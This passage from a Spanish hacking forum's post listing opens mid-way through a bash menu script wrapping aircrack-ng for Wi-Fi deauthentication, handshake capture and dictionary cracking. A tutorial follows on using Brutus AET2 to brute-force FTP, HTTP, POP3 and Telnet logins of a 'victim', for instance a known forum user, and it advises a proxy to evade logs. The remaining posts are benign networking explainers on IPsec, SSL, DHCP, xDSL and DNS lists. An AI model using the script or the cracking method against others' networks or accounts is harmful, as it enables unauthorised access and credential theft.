select INTER in $INTERFACES; do
break;
done
clear
}

monitor(){
airmon-ng start $INTER
clear
menu
}

handshake(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del Cliente: " mac_client
comprueba_mac $mac_client
read -p "[-] Introduzca el canal del AP: " mac_chanel
read -p "[-] Nombre de archivo donde se guardaran los datos capturados: " datas
xterm -hold -title "Obteniendo Handshake en $mac_ap" -geometry 96x60+0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $mac_ap -c $mac_chanel -w $datas $INTER && clear && menu
}

desautenticacion(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del cliente asociado: " mac_cliente
comprueba_mac $mac_cliente
read -p "[-] Introduzca el numero de desautenticaciones: " num
xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Desautenticando $mac_cliente del AP $mac_ap $num veces" -e aireplay-ng -0 $num -a $mac_ap -c $mac_cliente $INTER
clear
menu
}

crack_dicc(){
clear
read -p "[-] Introduzca la ruta del diccionario: " diccionario
echo "[-] Seleccione el archivo de datos capturados:"

LS_DIR=$(ls *.cap)
select DATA in $LS_DIR; do
break;
done

xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Obteniendo clave con diccionario: $diccionario" -hold -e aircrack-ng -w $diccionario $DATA
menu
}

menu(){
echo -e "\n[*] Opciones:\n"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\033[0m"
echo "1 - Activar Modo Monitor"
echo "2 - Capturar handshake"
echo "3 - Desautenticar cliente"
echo "4 - Obtener clave con diccionario"
echo "5 - Salir"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\n\033[0m"

read -p "opcion> " OPCION

case $OPCION in
"1") monitor;;
"2") handshake;;
"3") desautenticacion;;
"4") crack_dicc;;
"5") exit;;
*) echo -e "\033[31m[!] OPCION NO VALIDA\n\033[0m" && menu;;

esac
}

interfaces
menu

# __EOF__
<------------------------------------------------>

---------------------------------------------------------------------------------


---[ 0x06: Fin ]

Bueno pues eso es todo, los pasos son bastantes sencillos, cualquier duda pueden
entrar a la web de aircrack-ng (http//www.aircrack-ng.org) donde podrán encontrar abundante documentación
o mismamente enviándome un email.

Espero que se entienda.

Un saludo!

# ka0x

---------------------------------------------------------------------------------

__EOF__

# milw0rm.com [2009-03-09]

10
Hacking / [Tutorial] Brutus Aet2
« en: Abril 25, 2010, 01:16:01 pm »
[Tutorial] Brutus Aet2

By $ad

You are not allowed to view links. Register or Login


Brutus Aet2 es un crackeador muy conocido y la verdad que bastante útil si se sabe utilizar de la forma adecuada, en este tutorial conoceremos el funcionamiento de este software, cuyo fin es crackear User/Pass, útil para evitar el tener que registrarse en algunos foros, entre otras funciones.

Descargamos Brutus Aet2 de la web oficial:

You are not allowed to view links. Register or Login


Al iniciar este (Ejecutar el achivo con extensión .exe), la primera ventana que aparece es la siguiente:

You are not allowed to view links. Register or Login

Los parámetros que podemos observar, se describirán a continuación:


Apartado Nº1


You are not allowed to view links. Register or Login

#Target = En este campo hemos de incluir la dirección IP o nombre del host “remoto”.

#Type = Hemos de seleccionar el protocolo que utilizaremos para atacar “al remoto”, a cada uno de estos, le pertenece un puerto, a continuación dejo información sobre estos para saber de que estoy ablando:

*FTP----File Transfer Protocol o Protocolo de Transferencia de Archivos, el cual utiliza el puerto 21. Este protocolo se utiliza para la carga y descarga de archivos de internet, este comunica un cliente FTP con un servidor FTP. Util para capturar User/Pass empleado en servidores tipo FTP.

*HTTP (Basic-Form)----Hipertext Tranfer Protocol o Protocolo de transferencia de hipertexto, el cual utiliza el puerto 80, este se usa para el acceso a paginas web a traves de los navegadores. Se utilizaria para paginas que indican registro; foros, etc.

*(SMB) NetBios---- Network Basic Input/Output System, se encarga de enlazar un S.O de red con hw, utilizado para dar sorporte a algunos servicios de red, este protocolo utiliza el puerto 139.

*Telnet----Telecommunication Network, cuyo protoclo es utlizado para conexiones remotas, el cual utiliza el puerto 23.

*NetBus----Opción para este troyano.

*POP(POP3)----Post Office Protocol o Protocolo de la Oficina de Correo, utiliza el puerto 110, este se encarga de descargar mensajes de correo elctronico. Se utilizaria para obtener pass de correos electronicos.


Apartado Nº2


You are not allowed to view links. Register or Login

Bueno, pues una vez conocido estos parámetros, pasamos a ver los siguientes, los cuales son los relativos a >connection Options<:

#Port: En la chincheta >Type< al seleccionar un protocolo, fíjense que el puerto es asignado de forma automatica, cambia según el “Type” a utiliza o protocolo a utilizar, no necesariamente debe ser el correspondiente a este, podemos indicar otro.

#Connections: Correspondiente a las conexiones a realizar, debemos de tener en cuenta no indicar muchas conexiones, ya que puede rechazar estas el sistema objetivo (Si lo comprobamos en un router, será el claro ejemplo, una “1 conexión” este no rechaza, pero si ponemos varias, este rechaza “el testeo” de user y pass, parando dicho proceso), claro es, que mientras mas conexiones, mas posibilidades de éxito.

#Time out: Tiempo de reconexión.

#Use Proxy: Posibilidad de utilizar “un Proxy”.

Apartado Nº3

You are not allowed to view links. Register or Login

Ahora pasamos al apartado > HTTP (Basic) Options<:

#Method & KeepAlive, ambos los dejamos por defecto.


Apartado Nº4

You are not allowed to view links. Register or Login

En este apartado, es referido al ataque a utilizar y que emplear en este, por una parte tenemos la casilla >User Name<, en la cual hemos de indicar la ruta del dicc a utilizar en la casilla >Browse<; o utilizar un user por defecto, que seria correspondiente a la casilla >Single User< y escribir en el recuadro posterior el nombre de usuario.

   Bien, pues una vez tratado el User, pasamos a la Pass XD. O a ambos, ya que existen distintos modos de ataque:

Word List: Se utilizará un dicc, al cual hemos de indicar la ruta al igual que al User.
Combo list: Se utilizará para testear de forma conjunta User:Pass
Brute Force: No lo recomiendo, o si, pero como ultimo recurso, ya que puede quedar puede tardar bastante ademas de otras desventajas. Parámetros que encontramos en >Brute Force<:

Digits Only: “Testea” con números
Lowercase Alpha: “Testea con minúsculas”
Uppercase Alpha: “Testea con  mayúsculas”
Mixed Alpha: Mayúsculas + Minúsculas
Alphanumeric: Letras+Numeros
Full Keyspace: “Testea incluyendo espacios”
Custom Range: “Se indican que testear, valen numeros, símbolos, etc”
Min Length: Mínimo de caracteres de ambos campos.
Max Length : Máximo de caracteres de ambos campos.


Apartado Nº5

You are not allowed to view links. Register or Login

En este apartado, se muestran los resultados, “tiempo establecido” (Es relativo ya que afectan distintos factores), el progreso, etc.
 

Proceso


A continuación se muestra lo que seria el proceso completo.

You are not allowed to view links. Register or Login

Como pueden observar, en prime lugar se selecciona el target ("victima"), y seguidamente el protocolo a utilizar, que a de ser relativo a este. Despues el puerto y la config en relación a las conexiones...Pero pasamos al apartado Nº4 en el cual hemos de indicar un user o realizar el ataque si no conocemos este parámetro.

Un ejemplo, seria un foro en el cual se conoce el nombre usuario y queremos "conocer" la pass de este, entonces marcaremos la chincheta >Single User< en el campo posterior introducimos el nombre de usuario y para la Pass, seleccionaremos el modo que se citó previamente en este tutorial.

*A modo ejemplo para una Web, utilizanndo el protocolo HTTP, con puerto 80 (Y configurado lo parámetros de conexión):

You are not allowed to view links. Register or Login

#Indicando el user:

Code

#Y por último:

El modo para "obtener la pass"

*A modo ejemplo para un router, utilizando el protocolo HTTP, con puerto 80 (Y configurado lo parámetros de conexión a 1):

#Si conocemos el User lo ingresamos en el campo, de lo contrario, indicamos la ruta del dicc.

#Pass, proceso anterior.

Para establecer los campos de User/Pass, estan indicados en el apartado Nº4.


Nota: Como Tools integrada en el propio software, consta de un “generador de diccionarios”, que se encuentra en la parte superior de la ventana de Brutus Aet2, para utlizar este, se dirigen a la pestaña >Tools>Wordlist Generation.
Nota: Pueden ampliar los dicc, ya que estos son pobres XD.
Nota: Este tiene la opción de guardar la sesión, para cargar esta en otro momento y continuar con el trabajo.
Nota: Utilicen proxy, ya que todos los intentos se quedaran reflejados en los logs, aunque segun para qué, lo utilizaremos o no, eso se lo dejo en sus manos.

No me hago responponsable del uso que le den a tal herramienta, tomando como referencia este tutorial.

Antes de preguntar, prueben XD.

Un $alu2.

11
GNU/Linux / Reparar entorno gráfico Ubuntu/Kubuntu
« en: Abril 23, 2010, 05:03:16 pm »
Reparar entorno gráfico Ubuntu/Kubuntu


Los S.O que engloban "el mundo Linux", aportan muchas ventajas respecto a S.O MS Windows, pero como todos, son imperfectos, a continuación, voy a mostrar posibles soluciones para reparar el entorno gráfico de nuestro Linux, puede pasar que al iniciar nuestro sistema Linux, nos encontremos con la sorpresa de que no inicia la "interfaz gráfica" de este, ya sea por instalación defectuosa de un driver, error en algun archivo del sistema que afecte a tal aspecto, etc. Aconsejo que nunca esta mal tener esta información que recopilé, ya que puede ser valiosa a la hora de reparar nuestro sistema:

1º Solución: "Reparar entorno de las Xs", resumiendo, esto segun los paámetros que utilizamos puede ser a la reinstalación de estas:

sudo xorconfig

o

sudo dpkg-reconfigure xserver-org

2º Solución: "Error en el inittab":

Ambos los encontramos en: /etc/inittab

Cambiar el valor:

Default runlevel.(Do not set to 0 or 6)
id:initdefault:

a:

Default runlevel.(Do not set 0 or 6)
id:4:initdefault.

3º Solución:

sudo /etc/init.d/gdm start

->Enter Pass

aparece:

starting Gnome Display Manager

->Exit

4º Solución:

sudo gdm

sudo xorconfig

E indicamos la siguiente ruta:

/dev/input/mice

o de no ser la anterior, esta:

/dev/psavx

5º Solución:

Modo Recovery o Modo de recuperación, el cual se muestra al inicio del sistema.

6º Solución: "Limpiar y actualizar el sistema":

sudo aptitude clean

sudo aptitude update

sudo aptitude full-upgrade

->sudo reboot

7º Solución:

sudo dpkg-reconfigure xserver-xorg

->Si [Autodetecta el hardware de video]

->No [Buscar un controlador de forma manual]

Valores que podemos ver:

*Configurar nuestra tarjeta
*Recuperar la configuración predeterminada
*Para aceleración 3D controladores privativos

1->Seleccionar el modelo de la targeta gráfica.

2->Cuando indique identificar la tarjeta de video, deberemos borrar el nombre de la presente y escribimos nv en caso de que esta sea nvidia, o vesa en caso de que sea ATI.

3->En BUS ID, memoria asignada y demás parámetros, los dejamos por defecto y en >Framebuffer<>No<>En Teclado y ratón, lo dejamos por defecto, para >Monitor<>En la siguiente ventana marcamos "single" e indicamos la resolución de la PC

Nota: Mientras menor sea esta, puede ser mejor.
Nota: Con la barra espaciadora, indicamos la "resolución real" o mas apropiada a utilizar.

6->La profundidad de color, indicamos las mas alta.

7->Reiniciar el equipo:

sudo reboot


Un $alu2.

12
Redes / IPsec [Internet Protocol security]
« en: Abril 23, 2010, 04:56:05 pm »
IPsec [Internet Protocol security]

You are not allowed to view links. Register or Login

IPsec (abreviatura de Internet Protocol security) es un conjunto de protocolos cuya función es asegurar las comunicaciones sobre el Protocolo de Internet  (IP) autenticando y/o cifrando cada paquete IP en un flujo de datos. IPsec también incluye protocolos para el establecimiento de claves de cifrado.


Arquitectura de seguridad

IPsec está implementado por un conjunto de protocolos criptográficos para (1) asegurar el flujo de paquetes, (2) garantizar la autenticación mutua y (3) establecer parámetros criptográficos.

La arquitectura de seguridad IP utiliza el concepto de asociación de seguridad (SA) como base para construir funciones de seguridad en IP. Una asociación de seguridad es simplemente el paquete de algoritmos y parámetros (tales como las claves) que se está usando para cifrar y autenticar un flujo particular en una dirección. Por lo tanto, en el tráfico normal bidireccional, los flujos son asegurados por un par de asociaciones de seguridad. La decisión final de los algoritmos de cifrado y autenticación (de una lista definida) le corresponde al administrador de IPsec.

Para decidir qué protección se va a proporcionar a un paquete saliente, IPsec utiliza el índice de parámetro de seguridad (SPI), un índice a la base de datos de asociaciones de seguridad (SADB), junto con la dirección de destino de la cabecera del paquete, que juntos identifican de forma única una asociación de seguridad para dicho paquete. Para un paquete entrante se realiza un procedimiento similar; en este caso IPsec toma las claves de verificación y descifrado de la base de datos de asociaciones de seguridad.

En el caso de multicast, se proporciona una asociación de seguridad al grupo, y se duplica para todos los receptores autorizados del grupo. Puede haber más de una asociación de seguridad para un grupo, utilizando diferentes SPIs, y por ello permitiendo múltiples niveles y conjuntos de seguridad dentro de un grupo. De hecho, cada remitente puede tener múltiples asociaciones de seguridad, permitiendo autenticación, ya que un receptor sólo puede saber que alguien que conoce las claves ha enviado los datos. Hay que observar que el estándar pertinente no describe cómo se elige y duplica la asociación a través del grupo; se asume que un interesado responsable habrá hecho la elección.

Propósito de diseño

IPsec fue proyectado para proporcionar seguridad en modo transporte (extremo a extremo) del tráfico de paquetes, en el que los ordenadores de los extremos finales realizan el procesado de seguridad, o en modo túnel (puerta a puerta) en el que la seguridad del tráfico de paquetes es proporcionada a varias máquinas (incluso a toda la red de área local) por un único nodo.

IPsec puede utilizarse para crear VPNs en los dos modos, y este es su uso principal. Hay que tener en cuenta, sin embargo, que las implicaciones de seguridad son bastante diferentes entre los dos modos de operación.

La seguridad de comunicaciones extremo a extremo a escala Internet se ha desarrollado más lentamente de lo esperado. Parte de la razón a esto es que no ha surgido infraestructura de clave pública universal o universalmente de confianza (DNSSEC fue originalmente previsto para esto); otra parte es que muchos usuarios no comprenden lo suficientemente bien ni sus necesidades ni las opciones disponibles como para promover su inclusión en los productos de los vendedores.

Como el Protocolo de Internet no provee intrínsecamente de ninguna capacidad de seguridad, IPsec se introdujo para proporcionar servicios de seguridad tales como:

   1. Cifrar el tráfico (de forma que no pueda ser leído por nadie más que las partes a las que está dirigido)
   2. Validación de integridad (asegurar que el tráfico no ha sido modificado a lo largo de su trayecto)
   3. Autenticar a los extremos (asegurar que el tráfico proviene de un extremo de confianza)
   4. Anti-repetición (proteger contra la repetición de la sesión segura).

Modos

Así pues y dependiendo del nivel sobre el que se actúe, podemos establecer dos modos básicos de operación de IPsec: modo transporte y modo túnel.
Modo transporte [editar]

En modo transporte, sólo la carga útil (los datos que se transfieren) del paquete IP es cifrada y/o autenticada. El enrutamiento permanece intacto, ya que no se modifica ni se cifra la cabecera IP; sin embargo, cuando se utiliza la cabecera de autenticación (AH), las direcciones IP no pueden ser traducidas, ya que eso invalidaría el hash. Las capas de transporte y aplicación están siempre aseguradas por un hash, de forma que no pueden ser modificadas de ninguna manera (por ejemplo traduciendo los números de puerto TCP y UDP). El modo transporte se utiliza para comunicaciones ordenador a ordenador.

Una forma de encapsular mensajes IPsec para atravesar NAT ha sido definido por RFCs que describen el mecanismo de NAT transversal.
Modo túnel [editar]

En el modo túnel, todo el paquete IP (datos más cabeceras del mensaje) es cifrado y/o autenticado. Debe ser entonces encapsulado en un nuevo paquete IP para que funcione el enrutamiento. El modo túnel se utiliza para comunicaciones red a red (túneles seguros entre routers, p.e. para VPNs) o comunicaciones ordenador a red u ordenador a ordenador sobre Internet.

You are not allowed to view links. Register or Login

13
Redes / Listado de DNS
« en: Abril 23, 2010, 04:55:09 pm »
En ocasiones es posible que el servidor/es DNS que tiene asignado por defecto la configuración de conexión de red, por algun motivo no resuelve las direcciones como a de hacerlo, a continuación, se muestra una lista en la cual aparecen distintos servidores DNS para distintos ISP.



LISTADO DE DNS


Telefónica 80.58.0.97 97.Red-80-58-0.pooles.rima-tde.net
SuperBanda 212.4.96.22 ns1.grupalia.com
Tiscali 212.166.64.2 dns2.tiscali.es
Terra 213.4.141.1 dns2.terra.es
Orange 62.37.228.22 m2cachedns2.uni2.es
Terra 213.4.132.1 dns1.terra.es
Orange 62.37.228.22 m2cachedns2.uni2.es
Jazztel 87.216.1.65 [Unknown]
Orange 62.37.236.200 dns2.wanadoo.es
Tiscali 212.166.64.1 dns1.tiscali.es
ConexiónFutura 193.43.232.4 dns1.conexionfutura.com
Telefónica 80.58.61.250 250.Red-80-58-61.staticIP.rima-tde.net
Iberbanda 217.11.96.234 dns.mad.iberbanda.es
Comunitel 212.145.4.98 ns2.comunitel.net
ONO 62.42.230.135 dns01.ono.com
Orange 62.37.237.140 dns1.wanadoo.es
Jazztel 62.14.2.1 dns1.inversas.jazztel.es
Orange 62.37.225.58 pdns03pub.uni2.es
Telefónica 213.0.184.68 minerva.ttd.net
Telefónica 80.58.61.254 254.Red-80-58-61.staticIP.rima-tde.net
ONO 62.42.230.136 newsf01.ono.com
Iberdrola 193.127.102.104 ns2.presenzia.net
Arrakis 195.5.64.2 ns1.landsraad.net
ONO 62.42.230.24 resolv.ono.com
ONO 62.42.63.51 dns03.ono.com
Jazztel 62.14.4.64 dnscache1.jazzvisp.com
Jazztel 62.14.63.145 [Unknown]
Arsys 217.76.129.131 dns8.servidoresdns.net
ConexiónFutura 213.139.0.51 ns0.es.easynet.net
Telefónica 194.179.1.101 artemis.ttd.net
OpenForYou 213.195.64.129 dns1.ibercom.com
Arsys 217.76.128.131 dns7.servidoresdns.net
OpenForYou 213.195.79.129 dns2.ibercom.com
ConexiónFutura 213.139.0.52 ns1.es.easynet.net
Telefónica 80.58.0.33 33.Red-80-58-0.pooles.rima-tde.net
Adam 212.36.64.17 dns2.adam.es
Arsys 217.76.128.4 atlante.servidoresdns.net
Comunitel 212.145.4.97 ns1.comunitel.net
Iberdrola 213.172.33.35 ns2.neo.es
Arsys 217.76.129.4 prometeo.servidoresdns.net
Telefónica 213.0.184.69 artemis.ttd.net
Iberdrola 213.172.33.34 ns1.neo.es
Orange 62.37.225.57 dns2.comtenidos.com
Telefónica 80.58.32.33 33.Red-80-58-32.pooles.rima-tde.net
Reterioja 212.21.224.4 sn2.reterioja.es
Iberbanda 217.11.108.234 dns.bcn.iberbanda.es
TeleCable 212.89.0.31 dns.telecable.es
AunaCable 62.81.31.250 dns.iddeo.es
Telefónica 80.58.32.97 97.Red-80-58-32.pooles.rima-tde.net
Telefónica 194.179.1.100 minerva.ttd.net
Euskaltel 212.55.8.133 dns2.euskaltel.es
Reterioja 212.21.224.3 sn1.reterioja.es
Terra 195.235.113.3 dns.terra.es
Adam 212.36.64.16 dns1.adam.es
Orange 62.37.225.56 dns.comtenidos.com
Jazztel 62.14.4.65 dnscache2.jazzvisp.com
SuperBanda 212.4.96.21 ns2.grupalia.com
Euskaltel 212.55.8.132 dns.euskaltel.es
R 212.51.33.106 ns-cor.net.mundo-r.com
Arrakis 195.5.64.6 ns2.landsraad.net
Acens 217.116.0.177 ns2.acens.net
Orange 62.37.228.20 m2cachedns.uni2.es
Iberdrola 193.127.102.45 ns1.presenzia.net
Acens 217.116.0.176 ns1.acens.net
R 212.51.33.73 ns.mundo-r.com
Tele2 130.244.127.169 dns2.swip.net
Tele2 130.244.127.161 dns1.swip.net
ONO 62.42.63.52 [Unknown]
AunaCable 62.81.16.131 131-16-81-62.libre.auna.net
Ya.com 62.151.20.6 ns2.bs-ya.com
AunaCable 62.81.0.35 35-0-81-62.libre.auna.net
Ya.com 62.151.2.65 dns.yaonline.es
Ya.com 62.151.20.7 ns.bs-ya.com
Ya.com 62.151.8.100 dns2.ya.com
AunaCable 62.81.0.36 36-0-81-62.libre.auna.net
Ya.com 62.151.2.8 dns.ya.com
AunaCable 62.81.16.132 132-16-81-62.libre.auna.net
Telefónica 194.224.52.4 esifw1.tsai.es
Telefónica 194.224.52.6 esifw2.tsai.es
Telefónica 194.224.52.36 ns1.telefonica-data.com
Telefónica 194.224.52.37 ns2.telefonica-data.com
Terra 195.235.96.90 tpdns2.terra.es
AunaCable 62.81.0.1 mayor.red.retevision.es

You are not allowed to view links. Register or Login

14
Redes / [Tutorial] Configuracion de servidor DHCP ubuntu
« en: Abril 23, 2010, 04:54:31 pm »

 
Configuracion de servidor DHCP ubuntu

En este manual mostrare como configurar un servidor DHCP en cualquier computador con sistema operativo anfitrion Ubuntu. Antes de empezar vamos a hacer un pequeño repaso de teoria basico:Configuracion de servidor DHCP ubuntu

Servidor: ( Wikipedia )

Citar
En informática, un servidor es una computadora que, formando parte de una red, provee servicios a otras computadoras denominadas clientes

Servidor DHCP: ( ccm.itesm.mx )

Citar
Un servidor DHCP (Dynamic Host Configuration Protocol) se utiliza para asignar direcciones IP a las computadoras de los usuarios cuando éstas arrancan.

Cliente: ( Wikipedia )

Citar
El cliente es una aplicación informática que se utiliza para acceder a los servicios que ofrece un servidor, normalmente a través de una red de telecomunicaciones.

Bueno solo hablaremos de estos terminos, ya podremos empezar a configurar nuestro servidor.

Bueno antes que todo debemos actualizar los repositorios de nuestro S.O con el siguente comando, abrimos una terminal y escribimos lo siguiente:

Citar
sudo apt-get update

Ahora vamos a configurar nuestras interfaces de red. abrimos un terminal y escribimos lo siguiente

Citar
sudo gedit /etc/network/interfaces

ahora nos aparecera un editor de texto con lo siguiente

Citar
auto lo
iface lo inet loopback

ahora tendras que escribir lo siguiente debajo del texto que estaba en el editor de texto plano.

Citar
auto eth0
iface eth0 inet static
adress 192.168.0.10
netmask 255.255.255.0
gateway 192.168.0.1
broadcast 192.128.0.225

Lo que hicimos hay fue  configurar la interface eth0 que es la cableada para que nuestro equipo tuviera como IP estatica 192.168.0.10 , como mascara de red 255.255.255.0, como gateway 192.168.0.1 y como broadcast 192.128.0.225

¿ Y ahora que mas hacemos ?

ahora vamos a reiniciar nuestro servicio de red para que nos reconosca estos cambios que hicismo a la interface de eth0 ( cableada ), abrimos un terminal y escribimos esto.


Citar
sudo /etc/init.d/networking restart

ahora vamos al Synaptic y buscamos dchp3-server y lo aplicamos. despues de ya tener el dchp3-server en nuestro equipo ( es esencial para poder configurar el asignamiento de IP a los Computadores clientes) vamos a modificar el archivodhcp.conf vamos a abrir un terminal y escribimos esto que es para poder abrir el archivo dhcpd.conf abrirlo como super usuario.

Citar
sudo gedit /etc/dhcp3/dhcpd.conf

el archivo lo vamos a configurar para poder asignar las IP por defecto osea que si se conecta se le asignara IP sin ningun problema. el archivo debe quedar asi.

Citar
shared-network miredlocal {
subnet 192.168.0.0 netmask 255.255.255.0 {
options routers 192.168.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option domain-name "lanlocal.red";
option domain-name-servers 200..21.200.2, 200.21.200.79;
option netbios-name-servers 192.168.0.1;
range 192.168.0.11 192.168.0.199;
default-lease-time 21600;
max-lease-time 43200;
}

asi debe quedar si vos lo quieres que asigne IP por defecto pero si quieres asignarsela por MAC tambien se pude, tienes que configurarlo para que tambien las asigne por defecto pero debajo de el texto anterior tiene que colocar lo siguiente.

Citar
host 253 {
aption host-name "m253.local.red";
hardware athernet XX:XX:XX:XX:XX:XX;
fixed-address 192.168.0.253;
{

Bueno ahora despues de haber hablado con la configuracion del servidor vamos a iniciar el servidor. abrimos un terminal y escribes lo siguiente.

Citar
sudo /etc/init.d/dhcpd3-server start

"ejemplo grafico ;)"


Bueno ahora verificamos si el servicio del server esta habilitado.


listo ya tenemos nuestro servidor =) que tal si jugamos un poco?, bueno cositas basicas, con el siguiente comando podremos ver quienes estan conectados a nuestro servidor

Citar
sudo arp


y vamos a verificar la conexion de alguno de nuestros clientes


espero que esta documentacion les pueda servir alguna vez =)

-------------------------------------> by Progresive Death <-------------------------------------

Manual basado en la Guia_ubuntu_Server de Alanmein


Autor:Progresive_death
Fuente: CPH

15
Redes / Tecnologias XDSL
« en: Abril 23, 2010, 04:53:31 pm »
Cuando nos referimos a tecnologías XDSL, lo que estamos haciendo es mencionando la tecnología basada en el par de cobre trenzado como medio de transmisión de datos.

Existen 4 tipos de tecnologías XDSL:

VDSL, VDSL (o VHDSL) son las siglas de Very high bit-rate Digital Subscriber Line (DSL de muy alta tasa de transferencia). Se trata de una tecnología de acceso a internet  de Banda Ancha, perteneciente a la familia de tecnologías xDSL que transmiten los impulsos sobre pares de cobre.

Se trata de una evolución del ADSL, que puede suministrarse de manera asimétrica (52 Mbit/s de descarga y 12 Mbit/s de subida) o de manera simétrica (26 Mbit/s tanto en subida como en bajada), en condiciones ideales sin resistencia de los pares de cobre y con una distancia nula a la central.

La tecnología VDSL utiliza 4 canales para la transmisión de datos, dos para descarga y 2 para subida, con lo cual se aumenta la potencia de transmisión de manera sustancial.

HDSL, HDSL es el acrónimo de High bit rate Digital Subscriber Line o Línea de abonado digital de alta velocidad binaria.

Ésta es una más de las tecnologías de la familia DSL, las cuales han permitido la utilización del clásico bucle de abonado telefónico, constituido por el par simétrico de cobre, para operar con tráfico de datos en forma digital.

Los módems HDSL permiten el establecimiento por un par telefónico de un circuito digital unidireccional de 1,544 Mbps (T1) ó 2,048 Mbps (E1), por lo que para la comunicación bidireccional son necesarios dos pares. En este caso por cada par se transmite y recibe un flujo de 1024Kbps.

La distancia máxima entre terminales en que se puede utilizar está entre 3 y 4 km, dependiendo del calibre y estado de los pares de cobre.

ADSL, ADSL son las siglas de Asymmetric Digital Subscriber Line ("Línea de Suscripción Digital Asimétrica"). ADSL es un tipo de línea DSL. Consiste en una transmisión de datos digitales (la transmisión es analógica) apoyada en el par simétrico de cobre que lleva la línea telefónica convencional o línea de abonado, siempre y cuando la longitud de línea no supere los 5,5 km medidos desde la Central Telefónica, o no haya otros servicios por el mismo cable que puedan interferir.
Frecuencias usadas en ADSL. El área roja es el área usada por la voz en telefonía normal, el verde es el upstream o subida de datos y el azul es para el downstream o descarga de datos.

Es una tecnología de acceso a Internet de banda ancha, lo que implica una velocidad superior a una conexión tradicional por módem en la transferencia de datos. Esto se consigue mediante una modulación de las señales de datos en una banda de frecuencias más alta que la utilizada en las conversaciones telefónicas convencionales (300-3800 Hz), función que realiza el Router ADSL. Para evitar distorsiones en las señales transmitidas, es necesaria la instalación de un filtro (llamado splitter o discriminador) que se encarga de separar la señal telefónica convencional de las señales moduladas de la conexión mediante ADSL.
SDSL, Symmetric Digital Subscriber Line (SDSL). La tecnología SDSL es una variante de la DSL y se trata de una línea simétrica permanente con velocidades justamente de hasta 2.048 kbps.

SDSL es una forma de servicio de la línea del suscriptor Digital (DSL) que proporciona justamente igual ancho de banda para subida de datos (uploads), bajada de datos (downloads) y justamente transferencias directas. SDSL era una de las formas más tempranas de DSL para no requerir líneas telefónicas múltiples.

También Conocido Como: Línea Simétrica Del Suscriptor Digital, Dsl Single-line.


You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

16
Redes / SSL [Secure Sockets Layer]
« en: Abril 23, 2010, 01:54:26 pm »
SSL [Secure Sockets Layer]

You are not allowed to view links. Register or Login


Secure Sockets Layer -Protocolo de Capa de Conexión Segura- (SSL) y Transport Layer Security -Seguridad de la Capa de Transporte- (TLS), su sucesor, son protocolos criptográficos que proporcionan comunicaciones seguras por una red, comúnmente Internet.

Existen pequeñas diferencias entre SSL 3.0 y TLS 1.0, pero el protocolo permanece sustancialmente igual. El término "SSL" según se usa aquí, se aplica a ambos protocolos a menos que el contexto indique lo contrario.

Cómo funciona

El protocolo SSL intercambia registros; opcionalmente, cada registro puede ser comprimido, cifrado y empaquetado con un código de autentificación del mensaje (MAC). Cada registro tiene un campo de content_type que especifica el protocolo de nivel superior que se está usando.

Cuando se inicia la conexión, el nivel de registro encapsula otro protocolo, el protocolo handshake, que tiene el content_type 22.

El cliente envía y recibe varias estructuras handshake:

    * Envía un mensaje ClientHello especificando una lista de conjunto de cifrados, métodos de compresión y la versión del protocolo SSL más alta permitida. Éste también envía bytes aleatorios que serán usados más tarde (llamados Challenge de Cliente o Reto). Además puede incluir el identificador de la sesión.

    * Después, recibe un registro ServerHello, en el que el servidor elige los parámetros de conexión a partir de las opciones ofertadas con anterioridad por el cliente.

    * Cuando los parámetros de la conexión son conocidos, cliente y servidor intercambian certificados (dependiendo de las claves públicas de cifrado seleccionadas). Estos certificados son actualmente X.509, pero hay también un borrador especificando el uso de certificados basados en OpenPGP.

    * El servidor puede requerir un certificado al cliente, para que la conexión sea mutuamente autentificada.

    * Cliente y servidor negocian una clave secreta (simétrica) común llamada master secret, posiblemente usando el resultado de un intercambio Diffie-Hellman, o simplemente cifrando una clave secreta con una clave pública que es descifrada con la clave privada de cada uno. Todos los datos de claves restantes son derivados a partir de este master secret (y los valores aleatorios generados en el cliente y el servidor), que son pasados a través una función pseudoaleatoria cuidadosamente elegida.

TLS/SSL poseen una variedad de medidas de seguridad:

    * Numerando todos los registros y usando el número de secuencia en el MAC.
    * Usando un resumen de mensaje mejorado con una clave (de forma que solo con dicha clave se pueda comprobar el MAC). Esto se especifica en el RFC 2104).
    * Protección contra varios ataques conocidos (incluyendo ataques man-in-the-middle), como los que implican un degradado del protocolo a versiones previas (por tanto, menos seguras), o conjuntos de cifrados más débiles.
    * El mensaje que finaliza el protocolo handshake (Finished) envía un hash de todos los datos intercambiados y vistos por ambas partes.
    * La función pseudo aleatoria divide los datos de entrada en 2 mitades y las procesa con algoritmos hash diferentes (MD5 y SHA), después realiza sobre ellos una operación XOR. De esta forma se protege a sí mismo de la eventualidad de que alguno de estos algoritmos se revelen vulnerables en el futuro.

Aplicaciones

SSL se ejecuta en una capa entre los protocolos de aplicación como HTTP, SMTP, NNTP y sobre el protocolo de transporte TCP, que forma parte de la familia de protocolos TCP/IP. Aunque pueda proporcionar seguridad a cualquier protocolo que use conexiones de confianza (tal como TCP), se usa en la mayoría de los casos junto a HTTP para formar HTTPS. HTTPS es usado para asegurar páginas World Wide Web para aplicaciones de comercio electrónico, utilizando certificados de clave pública  para verificar la identidad de los extremos.

Aunque un número creciente de productos clientes y servidores pueden proporcionar SSL de forma nativa, muchos aún no lo permiten. En estos casos, un usuario podría querer usar una aplicación SSL independiente como Stunnel para proporcionar cifrado. No obstante, el Internet Engineering Task Force recomendó en 1997 que los protocolos de aplicación ofrecieran una forma de actualizar a TLS a partir de una conexión sin cifrado (plaintext), en vez de usar un puerto diferente para cifrar las comunicaciones – esto evitaría el uso de envolturas (wrappers) como Stunnel.

SSL también puede ser usado para tunelizar una red completa y crear una red privada virtual (VPN), como en el caso de OpenVPN.


You are not allowed to view links. Register or Login

17
{Ataque 1+3} Suite Aircrack-ng [Wifislax 3.1/Ubuntu 9.10]

By $ad

You are not allowed to view links. Register or Login
